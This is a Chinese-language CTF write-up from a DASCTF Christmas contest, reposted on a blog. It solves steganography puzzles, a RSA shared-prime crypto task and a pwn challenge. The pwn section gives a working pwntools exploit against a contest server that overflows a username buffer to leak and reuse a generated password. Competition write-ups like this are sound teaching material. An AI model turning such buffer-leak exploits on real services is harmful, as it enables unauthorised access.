嗚嗚圣誕節還要打比賽我太難了,但結果還不錯的樣子~
-
沒有0解
-
拿了FakePic的一血
-
混進了前四十有電子證書(嗚嗚,學到現在終于要有證書了)
下面就是WP了
Misc
-
馬老師的秘籍
下載得到一張全是二維碼的圖片,掃描了幾個發現每個二維碼都是馬老師經典語錄中的3個字,沒發現什么有用的資訊,懷疑要么flag在其中的幾張二維碼里,要么是全部掃出來連起來是密文,然后卡了好久…過了半小時,才想起來misc拿到圖片不應該先看看是不是可以分離嗎…
于是binwalk一番發現含有zip,用foremost分離,得到壓縮包,(手動裝死>_<)
用360壓縮(懶人必備)打開解壓出一張偽加密的圖片,發現是之前的二維碼圖片上寫了字,與之前的圖片異或得到壓縮包里2個文本的密碼
ps:在各大比賽0解的我,看到md5那叫一個激動啊,md5加密的字串各種打錯,瘋狂交flag…最后發現那是壓縮包另外兩個真加密檔案的密碼…
密碼為:c57988283c92f759585a0c1aebfdd743
打開發現為ook的替換密碼,按照壓縮包里的密碼本替換成ook,拿去ook解碼得到flag:DASCTF{f79f28f30232e26a2f51b6b75355afa9}
歐耶,終于不是0解了!
-
FakePic
在rar的注釋里得知密碼需要掩碼爆破,但是用ARCHPR爆破會出錯,幸好隊友的軟體可以爆破,果斷白嫖
用Accent RAR Password Recovery的掩碼爆破解出壓縮包密碼為1cpp,解壓得到flag.png和hint
Winhex打開圖片發現末尾有searchme_in_Alpha,猜測資料藏在alpha位里
hint中說只需要取前500位,圖片左上為資料區,用腳本提取:
from PIL import Image
img = Image.open('flag.png')
f=open('1.txt','w')
width,height=img.size
cnt=0
for i in range(0,height):
tmp = img.getpixel((0,i))
f.write(str(tmp[3]))
f.write('\n')
cnt+=1
if cnt>=320:
break
輸出后發現有效資料只有320位,且均為2的次方,觀察發現資料是8個一組,320/8等于40
分析一下,DASCTF{}加上里面的32位md5正好40個字符(神tm就是這個看似相當正確的想法,卡了我2個小時)
把得到的alpha的資料挨個算出是2的幾次方,按照8個一組連起來
hint里有個10132430,把連接得到的數減去10132430,發現只有1和0,試了試其他幾個,也是如此,看樣子是這個方向了
然后拿著DASCTF的二進制和解出來的二進制研究了好久…
經過兩個小時的分析,發現如果是DASCTF的話,前面的資料毫無規律可言,根本找不到辦法解密
所以我開始懷疑前面的字符真的是DASCTF嗎,于是終于跳出了坑,去試了試別的思路
因為第一位都是1,應該不是資料區,把后七位轉ASCII碼,又得不到可見字符,于是想到了異或
拿第一個二進制的后七位異或127試了試,嗯?居然是f!第二個試了試,嗯?居然是l!第三個試了試,嗯?居然是a!
然后不用試了,直接寫腳本叭:
import math
f=open('1.txt','r')
cnt=0
ans=0
char=''
flag=''
while 1:
a=f.readline().strip()
if a:
x=math.log(int(a),2)
ans=ans*10+x
cnt+=1
if cnt%8==0:
char=str(int(ans-10132430))
flag+=chr(int(char[1:8],2)^127)
ans=0
else:
break
print(flag)
解得flag_is:f582e9b319abe1edfd7df565fecf6f6f
交上去一看,230分,意思是一血咯?!不過估計是有大佬屯flag了,我交上去之后沒一會就有4個隊交了…
不過還是蠻開心的呀
Pwn
隊伍的Pwn神Am0n做的,太強惹~
-
π
老規矩,下載檔案,checksec,64位程式,保護全開,
64位ida打開反編譯(可以順手nc一下,會發現自己輸password是永遠不對的),把每一個函式重命名一下(在點進函式前先截個圖防止資料消失)然后發現password是程式自己隨機的,再看堆疊上,相差0x40位,那就在用戶名處輸入0x40個A,發現會有密碼一起輸出,接收復制成功登錄,
之后就是使pi精確到小數點后七位,因為蒙特卡羅法只能到后四位,再看到堆疊地址只差4位,利用資料型別差異填充4個00000000位元組,然后讓pi成為3.1415925就行
于是撰寫exp如下:
from pwn import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
p=remote('183.129.189.60',10022)
payload1='a'*0x40
p.recvuntil("Username:")
p.sendline(payload1)
payload_tmp=p.recvline()
payload2=payload_tmp[73:len(payload_tmp)-3]
p.recvuntil("Passcode:")
p.sendline(payload2)
p.recvuntil("N = ")
p.sendline('4632251120704552960')
p.interactive()
運行結果如下:
得到flag:flag{9b11a5c99b94bc3c1cb6c2eaae3635f5}
Crypto
-
asa
分析加密腳本后發現,key和iv是用兩個不同的n加密的,但是這兩個不同的n有公約數p,利用歐幾里得演算法可以直接算出p將n1,n2分解
然后就可以得到私鑰來解密key和iv,直接AES解密c得到flag,于是撰寫腳本如下:
import gmpy2
from Crypto.Util.number import bytes_to_long, long_to_bytes, getPrime
from Crypto.Cipher import AES
n1=111712778091852625802807311056859998298970333546125094838389323068692821886184553378904639412839707325547114746568858307483992628506128942319609958185457116744911802621616515340780086912120581771589608471141772954459340729735006798414324279454474007716618518679131920753424764339930924955571352051764002796333
n2=71707639690216433675232741199222429818561051229060394670142957860022628136162670818217726648487874599663148522813581524760255898491677110179129965208487449699256695272481200055881732340087583529425454792007263521876894685932242167418320077475585091550034033257455342129960124374817637634793376809583004474951
p=9540203717217880059997385799331301649727503984010337568404427747385824530958536656147747848448822264268428226235860927158082497191830274046098671199542207
q1=7516363572069282672026207933559652178219500346572833541898291914709599489663099294873864325874446529790989623154562433650903688205637808143655002021347193
q2=11709684761787285321169271535544195271858094227802343600689046124468724036061594373710783769953414491363505203702886296365059403955548433247809736064179219
e=65537
d1=22751860166293246896299641736677467776174657052612750763247519198945794428542145307139774599518697291993767038213308729814681190064176477853194813564021662181242405176598138826363682508282150748140208688199627234068625272548758088148657737577609037881503639410115906431283491221618609366107579285603369697697
d2=42851328691442744709961899273058020617938190869524677039569543809205011663591459593699493876731882790743075173016685673617042139371890313578172249856175991022619151508216199429379920708129487059457065788745916359633698552776476030124414276631210874256653083142350155265787158436871852213326602646838351825749
m1=9461351078657548652396681809211932638044193765898930151236896556668911269483790712362119720710662740426592639474221773148581196815799602162765910950718127783209958120183637692129089203664577799287200796148962802169495862542884546549702753354190016971295736969334060862926458442658790015201819985795888590846
m2=68994739793992204231992907666932893302772945582737552366488567625277445018896498986007443263789932683081212481879111238740219279346371792684015145690696931794485977024907758839472694700531125411837361828844480683275698231613050197956121787134395064692002237936019649308420188422123114291151735774475204538867
key=182321968565716316827426094459629642479
iv=326941582454611718721442173349848199742
key = long_to_bytes(key)
iv = long_to_bytes(iv)
c = long_to_bytes(eval('0xf8559d671b720cd336f2d8518ad6eac8c405585158dfde74ced376ba42d9fe984d519dc185030ddec7b4dc240fd90fa8'))
m = AES.new(key, AES.MODE_CBC, iv).decrypt(c)
print(m)
運行得到flag:DASCTF{e4f6c51dc2fe722173e41b47533879bc}
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/240959.html
標籤:其他